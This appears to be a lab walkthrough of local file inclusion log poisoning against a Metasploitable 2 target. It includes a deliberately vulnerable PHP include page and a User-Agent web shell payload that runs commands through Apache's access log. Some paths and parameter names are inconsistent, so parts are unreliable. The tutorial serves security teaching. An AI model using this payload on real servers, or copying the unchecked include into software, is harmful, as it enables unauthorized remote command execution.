Through this article you will see how to create local file inclusion log posioning inside the target machine and gain unauthourized access with help of apache access .log file.

Attacker: Kali Linux

Target: Metasploitable 2

 Connect the target using SSH  service as shown below in the following image

ssh msfadmin@192.168.1.8

 Now login with user as “sudo” and create a folder “lfi” inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.

<?php

   $file = $_GET[‘file’];

   if(isset($file))

   {

       include(“$file”);

   }

   else

   {

       include(“index.php”);

   }

   ?>

Now I have saved above PHP code inside a text file as lfi.php andshare this file.

In order to download lfi.PHP inside the lfi directory type following command

Wget http://192.168.1.25/lfi.php

Now let’s browse following URL: 192.168.1.8/lfi/lfi.php

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now I will try to open apache access.log file and to explore this file first I will give read permission to apache2 and then include the acess.log file.

Now include the acess.log file as file parameter and give following URL inside browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log

Now turn on burp suite to capture the request of same web page

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute lsb_release –a through cmd and view the result from inside the given screenshot.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here